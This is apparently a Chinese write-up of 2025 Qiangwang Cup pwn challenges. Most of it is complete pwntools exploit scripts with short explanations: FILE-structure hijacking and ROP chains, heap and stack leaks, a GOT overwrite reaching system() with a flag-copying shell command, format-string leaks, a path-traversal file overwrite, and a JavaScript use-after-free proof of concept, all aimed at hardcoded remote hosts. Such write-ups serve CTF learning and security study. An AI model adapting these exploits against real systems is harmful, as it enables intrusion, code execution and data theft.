#2025 强网杯初赛 Writeup#Bph乍一看是菜单堆,但是 create 只允许同时存在一个 note,edit 和 view 都是假的(只读 index),我一开始不确定是不是注册了什么 handler(但是我 ida 和 gdb 的结果都是一样的),token 函数可以在 libc/pie/stack 里三选一泄漏一个。
但是稍微尝试一下发现 create 时输入的 size 可以无限大,配合一开始的泄漏地址,那就相当于有了任意 libc 写 \x00 的原语。
这是一个很板子的问题,任意 libc 写 \x00 可以去打 stdin 实现二次的任意写,然后打 IOFILE 完成利用。当然最后一步也可以用 House of some 的板子一把梭。
from pwn import *
from sys import argv
from pwnlib.tubes.process import PIPE
context.terminal = ['tmux', 'splitw', '-h']
proc = "./chall"
context.log_level = "debug"
context.binary = proc
elf = ELF(proc, checksec=False)
#io = process(proc, stdin=PIPE, stdout=PIPE)
io=remote('8.147.130.84',28680)
libc=ELF('./libc.so.6')
def choose(idx):
    io.sendlineafter(b"Choice: ", str(idx).encode())
def create(size,content):
    choose(1)
    io.sendlineafter(b"Size: ", str(size).encode())
    io.sendlineafter(b"Content: ", content)
payload=b'a'*0x26+b'b'
io.sendlineafter(b"Please input your token: ", payload)
io.recvuntil(b"ab\n")
leak = u64(io.recvuntil(b".\n", drop=True).ljust(8, b"\x00"))
log.info(f"leak => {hex(leak)}")
libc_base=leak-126-libc.sym['free']
#-0x2db899
log.info(f"libc_base => {hex(libc_base)}")
sleep(1)
_IO_2_1_stdin_=libc_base+libc.sym['_IO_2_1_stdin_']
_IO_buf_base=_IO_2_1_stdin_+0x39
_IO_list_all=libc_base+libc.sym['_IO_list_all']
stdout_addr=libc_base+libc.sym['_IO_2_1_stdout_']
fake_file_start=_IO_list_all-0x500
sleep(1)
create(_IO_buf_base,p64(stdout_addr)*0x4+p64(stdout_addr+0x210)+p64(0))
sleep(1)
payload=p64(stdout_addr)*0x3+p64(stdout_addr+0x210)
pop_rbp=libc_base+0x28a91
magic_gadget=libc_base+0x176F3E #mov rdx,qword ptr [rax+0x38];mov rdi,rax;call qword ptr [rdx+0x20]
setcontext=libc_base+libc.sym['setcontext']+61
fake_file_struct = flat(
    {
        # offset: value # field_name
        0x0: 0,                                             # _flags
        0x8: pop_rbp,                                       # _IO_read_ptr
        0x10: fake_file_start + 0x470 - 8,                         # _IO_read_end
        0x18: 1,                                    # _IO_read_base
        0x20: 0,                                             # _IO_write_base
        0x28: 1,                                             # _IO_write_ptr
        0x38: stdout_addr+0xe0-0x20,
        # _IO_write_end (0x30) 到 _markers (0x60) 之间未设置的字段将被 flat 自动填充为0
        0x68: magic_gadget,                                    # _chain
        # _fileno (0x70) 到 _shortbuf (0x83) 之间未设置的字段将被 flat 自动填充为0
        0x88: fake_file_start - 0xc30,                             # _lock
        # _offset (0x90) 将被 flat 自动填充为0
        0x98: stdout_addr,                                  # _codecvt
        0xa0: stdout_addr - 0x48,                            # _wide_data
        # _freeres_list (0xa8) 到 _unused2 (0xc4) 之间未设置的字段将被 flat 自动填充为0
        0xd8: libc.sym['_IO_wfile_jumps'] + libc_base - 0x20  # vtable
    },
    filler=b'\x00'
)
pop_rax_ret=libc_base+0xdd237
pop_rdi_ret=libc_base+0x10f78b
pop_rsi_ret=libc_base+0x110a7d
syscall=libc_base+0x45539
payload2=fake_file_struct+p64(setcontext)+b'\x00'*(0xa0-0x20-0x28)+p64(0x0)+p64(0x40)+b'flag'+b'\x00'*4+b'\x00'*0x8+p64(stdout_addr+0x160)
payload2+=p64(pop_rax_ret)+p64(257)+p64(pop_rdi_ret)+p64(0xffffffffffffff9c)+p64(pop_rsi_ret)+p64(stdout_addr+0xe0+0x70)+p64(syscall)
payload2+=p64(pop_rax_ret)+p64(0)+p64(pop_rdi_ret)+p64(3)+p64(pop_rsi_ret)+p64(stdout_addr)+p64(syscall)
payload2+=p64(pop_rax_ret)+p64(1)+p64(pop_rdi_ret)+p64(1)+p64(syscall)
io.sendafter(b'Choice: ',payload2)
io.interactive()
#adventure扔给 agent 逆向先,在 sub_1F974 地方似乎有个 0x80 字节的溢出写,购买商品还有整数溢出的漏洞
因此思路如下:
from pwn import *
filename = './pwn'
context.arch='amd64'
context.log_level = "debug"
context.terminal = ['tmux', 'neww']
local = 0
all_logs = []
elf = ELF(filename)
libc = elf.libc
if local:
    sh = process(filename)
else:
    sh = remote('47.94.205.237', 28709)
def debug(params=''):
    for an_log in all_logs:
        success(an_log)
    pid = util.proc.pidof(sh)[0]
    gdb.attach(pid, params)
    pause()
def leak_info(name, addr):
    output_log = '{} => {}'.format(name, hex(addr))
    all_logs.append(output_log)
    success(output_log)
def get_name():
    sh.sendlineafter("Name: ", "warrior")
def move_s():
    sh.sendlineafter("> ", 's')
def move_d():
    sh.sendlineafter("> ", 'd')
def shop(index, nums):
    sh.sendlineafter("> ", "shop")
    sh.sendlineafter("option: ", "12")
    sh.sendlineafter("buy : ", str(index))
    sh.sendlineafter(": ", str(nums))
    sh.sendline('')
    sh.sendlineafter(": ", "14")
def shop2(index):
    sh.sendlineafter("> ", "shop")
    sh.sendlineafter("option: ", "12")
    sh.sendlineafter("buy : ", str(index))
    sh.sendline('')
    sh.sendlineafter(": ", "14")
def shop_show():
    sh.sendlineafter("> ", "shop")
    sh.sendlineafter("option", "13")
    sh.recvuntil("1 gold)\n   ")
    heap_leak = u64(sh.recv(6).ljust(8, b'\x00'))
    sh.sendlineafter("sell: ", "3")
    sh.sendline('')
    sh.sendlineafter(": ", "14")
    return heap_leak
def fight_dragon():
    sh.sendlineafter("> ", "search")
    sh.sendlineafter("action: ", "5")
    sh.sendlineafter("item: ", '1')
    sh.sendlineafter(": ", '500000')
    sh.sendlineafter("item: ", "2")
def inv(payload, des):
    sh.sendlineafter('> ', 'inv')
    sh.sendlineafter("item : ", "4")
    sh.sendlineafter("action: ", '1')
    sh.sendlineafter("name : ", payload)
    sh.recvuntil("description : ")
    leak = u64(sh.recv(6).ljust(8, b'\x00'))
    sh.sendlineafter("New description : ", des)
    return leak
def calc_heap(addr):
    s = hex(addr)[2:]
    s = [int(x, base=16) for x in s]
    res = s.copy()
    for i in range(9):
        res[3+i] ^= res[i]
    res = "".join([hex(x)[2:] for x in res])
    return res
def map():
    sh.sendlineafter("> ", "map")
get_name()
shop(4, 8500600)
move_s()
move_s()
move_s()
move_d()
fight_dragon()
heap_leak = shop_show()
# leak_info("heap_leak", heap_leak)
heap_leak = int(calc_heap(heap_leak), 16)
leak_info("heap_leak", heap_leak)
# debug("b *$rebase(0x1FB13)")
# debug("b *$rebase(0x1FB50)")
shop(1, 10)
shop(2, 0x10)
payload = b'a'*0x40 + p64(heap_leak - 0x3f8 + 7)
des = b'x'*10
leak = inv(payload, des=des)
# leak_info("leak", leak)
payload = b'a'*0x40 + p64(heap_leak - 0x440)
des = b''
code_leak = inv(payload, des=des)
leak_info("code_leak", code_leak)
code_base = code_leak - 0x367b8
leak_info("code_base", code_base)
payload = b'a'*0x40 + p64(code_base + 0x372a8)
des = b'a'
libc_leak = inv(payload, des=des)
leak_info("libc_leak", libc_leak)
payload = b'a'*0x40 + p64(libc_leak - 0x1dd0)
des = b'a'
stderr = inv(payload, des=des)
leak_info("stderr", stderr)
libc.address = stderr - 0x21b6a0
leak_info("libc.address", libc.address)
payload = b'a'*0x40 + p64(heap_leak - 0x64e0)
des = b'a'
stack_leak = inv(payload, des=des)
leak_info("stack_leak", stack_leak)
# debug("b *$rebase(0x2A8E4)")
# map()
pop_rdi = 0x2a3e5 + libc.address
pop_rsi = 0x1518c2 + libc.address
pop_rdx_2 = 0x904a9 + libc.address
pop_rax = 0x45eb0 + libc.address
syscall = 0x91316 + libc.address
pop_rcx = 0x3d1ee + libc.address
pop_rsp = 0x35732 + libc.address
add_rsp_820 = 0x149878 + libc.address
xor_eax = 0x404f8 + libc.address
xor_edi_syscall = 0xd9c4c + libc.address
xor_edx_eax = 0xa8558 + libc.address
new_rop = stack_leak - 0xde0
rop_chain = [
    xor_eax,
    pop_rsi,
    stack_leak-0xda8+8,
    xor_edx_eax,
    pop_rdx_2,
    0x1011,
    0x1011,
    xor_edi_syscall
]
for i, gadget in enumerate(rop_chain):
    payload = b'a'*0x40 + p64(new_rop + i*8)
    des = p64(gadget)
    inv(payload, des=des)
rop_start = stack_leak - 0x1620
payload = b'a'*0x40 + p64(rop_start)
des = p64(add_rsp_820)
# debug("b *$rebase(0xBA84)")
inv(payload, des=des)
final_rop = p64(pop_rax) + p64(10)
final_rop += p64(pop_rdi) + p64((stack_leak - 0xd48)&0xfffffffffffff000)
final_rop += p64(pop_rsi) + p64(0x1000)
final_rop += p64(pop_rdx_2) + p64(7)*2
final_rop += p64(syscall) + p64(stack_leak - 0xd48)
final_rop += asm(shellcraft.open("/flag"))
final_rop += asm(shellcraft.read(3, stack_leak, 0x40))
final_rop += asm(shellcraft.write(1, stack_leak, 0x40))
sh.send(final_rop)
sh.interactive()
#sockserver出题人给了一个 webserver.py,一个 socket5 server,socket5 server里面自定义了一个菜单堆。
出题人给的 dockerfile 需要稍微改一下:
# 把原先的 COPY ./bin/ /home/ctf/ 替换成下面的
COPY ./sockserver /home/ctf/
COPY ./webserver.py /home/ctf/
RUN mkdir /home/ctf/web
COPY ./web/index.html /home/ctf/web/
COPY ./flag /home/ctf/
COPY ./monitor.sh /home/ctf/
洞主要就是以下几个:
delete 函数里直接对 msg_cnt 减一,这就有可能导致 msg_cnt != cur_idx,按理说这俩应该是保持一致的,而 add 函数里又只对 msg_cnt 做了检测,所以理论上可以做到无限申请 + 数组越界clear_all 函数会把 msg 结构体 reset,但是不会重构指针,可以做 uaftps,花了三个小时写的 poc 贴上面了,血的教训Strcmp 可以用来侧信道 leakmsgbox `数组越界写,可以改 got这是最终封装的 exp:
from pwn import *
import time
import threading
import socket
context.log_level = 'info'
context.arch = 'amd64'
context.os = 'linux'
libc = ELF("./libc.so.6")
class SOCK5Pwn:
    def __init__(self, host="127.0.0.1", port=1080):
        self.host = host
        self.port = port
        try:
            self.io = remote(self.host, self.port, timeout=10)
        except Exception as e:
            while True:
                info(f"Reconnecting due to error: {e}")
                self.io = remote(self.host, self.port, timeout=10)
                if self.io:
                    break
            pass
    def choose(self, method):
        request = p8(5) + p8(1) + p8(method)
        self.io.send(request)
        response = self.io.recv(2)
        if len(response) != 2:
            return -1
        ver, selected = response[0], response[1]
        if ver != 5:
            return -1
        return selected
    def _add(self, msg):
        res = self.choose(3)
        if res != 3: return None
        self.io.recv(2)
        self.io.send(msg)
        result = self.io.recv(2)
        # info(f"_add result: {result.hex()}")
        if len(result) != 2: return False
        return result[1] == 0x00
    def _delete(self, msg):
        res = self.choose(4)
        if res != 4: return None
        self.io.recv(2)
        self.io.send(msg)
        result = self.io.recv(2)
        # info(f"_delete result: {result.hex()}")
        if len(result) != 2: return False
        return result[1] == 0x00
    def _sock(self, content):
        if self.choose(5) != 5: return False
        if self.io.recv(2, timeout=3) != b'\x05\x01': return False
        self.io.send(content)
        result = self.io.recv(2)
        if len(result) != 2 or result[1] != 0x00: return False
        req = p8(5) + p8(1) + p8(0) + p8(3)
        target_host = b'aaaaaaaa'
        req += p8(len(target_host)) + target_host
        req += p16(80)
        self.io.send(req)
        response = self.io.recv(10)
        return len(response) == 10 and response[0] == 5
    def _reset(self):
        if self.choose(6) != 6: return False
        result = self.io.recv(2)
        if len(result) != 2: return False
        return result[1] == 0x00
    def system(self):
        if self.choose(5) != 5: return False
        if self.io.recv(2) != b'\x05\x01': return False
        self.io.send(b"a\x00")
        result = self.io.recv(2)
        if len(result) != 2 or result[1] != 0x00: return False
        target_host = b'cat /home/ctf/flag > /home/ctf/web/flag.html'
        req = p8(5) + p8(1) + p8(0) + p8(3)
        req += p8(len(target_host)) + target_host
        req += p16(80)
        self.io.send(req)
        response = self.io.recv(10)
        if len(response) != 10 or response[0] != 5: return False
        return response[1] == 0x00
    def close(self):
        if self.io:
            self.io.close()
    def read_flag(self):
        if self.choose(5) != 5:
            return False
        ack = self.io.recv(2, timeout=2)
        if ack != b'\x05\x01':
            return False
        self.io.send(b"a\x00")
        result = self.io.recv(2, timeout=200)
        if len(result) != 2:
            return False
        status = result[1]
        if status == 0x01:
            return False
        elif status == 0x00:
            pass
        else:
            return False
        target_host = '1.0.0.127'
        target_port = 37151
        req = p8(5) + p8(1) + p8(0) + p8(1)
        ip = struct.unpack("!l", socket.inet_aton(target_host))[0]
        req += p32(ip) + p16(target_port)
        pause()
        self.io.send(req)
        response = self.io.recv(10, timeout=200)
        if len(response) != 10:
            return False
        ver = response[0]
        rep = response[1]
        if ver != 5:
            return False
        if rep == 0x00:
            self.io.send(b"GET /flag.html HTTP/1.1\r\nHost: localhost\r\n\r\n")
            data = self.io.recvall(timeout=100)
            info(f"Received data: {data}")
            return True
        else:
            return False
def add(content):
    try:
        pwn = SOCK5Pwn()
        pwn._add(content)
        pwn.close()
    except Exception as e:
        pass
def delete(content):
    try:
        pwn = SOCK5Pwn()
        res = pwn._delete(content)
        pwn.close()
        return res
    except Exception as e:
        return False
def reset():
    try:
        pwn = SOCK5Pwn()
        pwn._reset()
        pwn.close()
    except:
        pass
def sock(content):
    try:
        pwn = SOCK5Pwn()
        res = pwn._sock(content)
        pwn.close()
        return res
    except:
        return False
sol = b""
sol_lock = threading.Lock()
byte_found_event = threading.Event()
def brute_worker(byte_range):
    global sol
    current_sol = sol
    for j in byte_range:
        if byte_found_event.is_set():
            return
        m = current_sol + p8(j) + b"\x00"
        if sock(m):
            with sol_lock:
                if len(sol) == len(current_sol):
                    sol += p8(j)
                    info(f"Found byte => {hex(j)}")
                    byte_found_event.set()
            return
def brute(num_threads=32):
    global sol
    sol = b""
    info("Bruting first byte...")
    for j in range(256):
        if j % 0x10 == 9:
            m = p8(j) + b"\x00"
            if sock(m):
                sol = p8(j)
                info(f"Found first byte => {hex(j)}")
                break
    if not sol:
        error("Failed to brute the first byte.")
        return 0
    for i in range(4):
        info(f"Bruting byte position {i+2}...")
        byte_found_event.clear()
        threads = []
        chunk_size = 256 // num_threads
        for t_id in range(num_threads):
            start_byte = t_id * chunk_size
            start_byte = 1 if t_id == 0 else start_byte
            end_byte = 256 if t_id == num_threads - 1 else (t_id + 1) * chunk_size
            if start_byte >= end_byte:
                continue
            thread = threading.Thread(target=brute_worker, args=(range(start_byte, end_byte),))
            threads.append(thread)
            thread.start()
        for thread in threads:
            thread.join()
    final_sol = b"\x00" + sol
    res = u64(final_sol.ljust(8, b"\x00"))
    return res
def run_tasks_in_batches(tasks, max_threads=16):
    for i in range(0, len(tasks), max_threads):
        batch = tasks[i:i+max_threads]
        for t in batch:
            t.start()
        for t in batch:
            t.join()
def parallel_add(count, content, max_threads=20):
    info(f"Starting {count} parallel add requests (max {max_threads} threads at a time)...")
    tasks = [threading.Thread(target=add, args=(content,)) for _ in range(count)]
    run_tasks_in_batches(tasks, max_threads)
    info("Parallel add requests finished.")
def parallel_add_delete(count, add_content, delete_content, max_threads=20):
    info(f"Starting {count} parallel add/delete requests (max {max_threads} threads at a time)...")
    def worker():
        add(add_content)
        delete(delete_content)
    tasks = [threading.Thread(target=worker) for _ in range(count)]
    run_tasks_in_batches(tasks, max_threads)
    info("Parallel add/delete requests finished.")
if __name__ == '__main__':
    addr = 0x000000000405050
    parallel_add(100, b"a" * 0x20)
    add(flat([0, 103, -3, addr - 1]))
    add(b"\x00")
    reset()
    parallel_add_delete(100, b"c" * 0x20, b"b\x00")
    add(flat([0, 102, -1, -1]))
    info("Leaking libc address...")
    leaked_addr = brute(num_threads=16)
    if leaked_addr == 0:
        error("Failed to leak address.")
        exit()
    libc.address = leaked_addr - 0x127900
    info(f"libc base => {hex(libc.address)}")
    info(f"system addr => {hex(libc.sym['system'])}")
    reset()
    parallel_add(100, b"a" * 0x20)
    add(flat([0, 102, -0x104 + 1, libc.sym['system'] - 1]))
    add(b"x" * 0x20)
    info("Triggering system()...")
    pwn = SOCK5Pwn()
    if pwn.system():
        success("Command executed! Check for the flag.")
    pwn.close()
    pwn = SOCK5Pwn()
    pwn.read_flag()
    pwn.close()
由于远程环境 10s 重启一次 sockserver,因此需要打快点,这里用多线程加速爆破。
#Flagmarket由于格式化字符串存在 bss 上,而 bss 上存在溢出写,所以可以修改格式化字符串的内容,那么只需要每次 pay 的 Money 都不是 255 就可以无限 fmt,而 flag 又是读在堆上的,所以一次泄漏堆地址,然后读入 flag 地址再用 %s 打印即可。
from pwn import *
p = process('./chall')
p.recvuntil(b'exit')
p.sendline(b'1')
p.recvuntil(b'?')
p.sendline(b'255')
p.recvuntil(b'opened user.log, please report:')
p.sendline(b'q' * 0x100 + b'%9$p%12$s')
p.recvuntil(b'exit')
p.sendline(b'1')
p.recvuntil(b'?')
# gdb.attach(p, 'b *0x4014bc')
p.sendline(p64(0x4042C8))
p.recvuntil(b'0x')
heap_addr = int(p.recvuntil(b'we')[:-2], 16)
print(f'heap_addr: {hex(heap_addr)}')
flag = heap_addr + 0x1e0
p.recvuntil(b'exit')
p.sendline(b'1')
p.recvuntil(b'?')
p.sendline(p64(flag))
p.interactive()
#Filesystem结构体如下:
struct filesystem{
    char filename[0x30];
    char content[0xa0];
    short length;
    size_t* fileptr;
};
想了半天没想出来怎么打,但是程序 的create_file 功能里面有路径穿越可以直接根据 dockerfile 里面的程序路径覆盖程序:
from pwn import *
filename = './chall'
context.arch='amd64'
context.log_level = "debug"
context.terminal = ['tmux', 'neww']
local = 0
all_logs = []
elf = ELF(filename)
libc = elf.libc
if local:
    sh = process(filename)
else:
    sh = remote('8.147.135.195', 30722)
def debug(params=''):
    for an_log in all_logs:
        success(an_log)
    pid = util.proc.pidof(sh)[0]
    params = "decompiler connect ida --host localhost --port 3662\n" + params
    gdb.attach(pid, params)
    pause()
def leak_info(name, addr):
    output_log = '{} => {}'.format(name, hex(addr))
    all_logs.append(output_log)
    success(output_log)
def input_dirname(name):
    sh.sendlineafter("input DirectoryName: ", name)
def creat_file(name, content):
    sh.sendafter("> ", "1")
    sh.sendafter("input filename (max length = 0x30): ", name)
    sh.sendafter("input content (max length 0xa0): \n", content)
def open_file(name):
    sh.sendafter("> ", "2")
    sh.sendafter("input filename (max length = 0x30): ", name)
def edit_file(index, content):
    sh.sendafter("> ", "3")
    sh.sendlineafter("input file idx: ", str(index))
    sh.sendafter("input content (max length 0xa0): \n", content)
def show_file(index):
    sh.sendafter("> ", "4")
    sh.sendlineafter("input file idx: ", str(index))
# os.system("rm ./temp/*")
input_dirname("/")
# debug("b *$rebase(0x1AA4)")
# name = b"/"*(0x30)
name = b"../../../../../../../home/ctf/chall"
content = b"/bin/sh"
creat_file(name, content)
sh.interactive()
#babyjs实现 uaf 的 poc,来自 @Tplus 师傅
let a = [
    "A",
    "B",
    "C"
];
Object.defineProperty(a, 0, {
  configurable: true,
  get() {
    // console.log('getter(0) called on array "a"');
    // // a.length = 1;
    // // gc();
    globalThis.spray = [];
    for (let i = 0; i < 500; i++) {
        spray.push("M");
    }
    // // getter 返回原始值 "A"
    return "B";
  }
});
console.log("Calling a.unique()...");
let new_arr = a.unique();
console.log("a.unique() returned. new_arr is:", new_arr);
JSON.stringify(new_arr);
Math.min(a[0]);
console.log("Script finished (you likely won't see this).");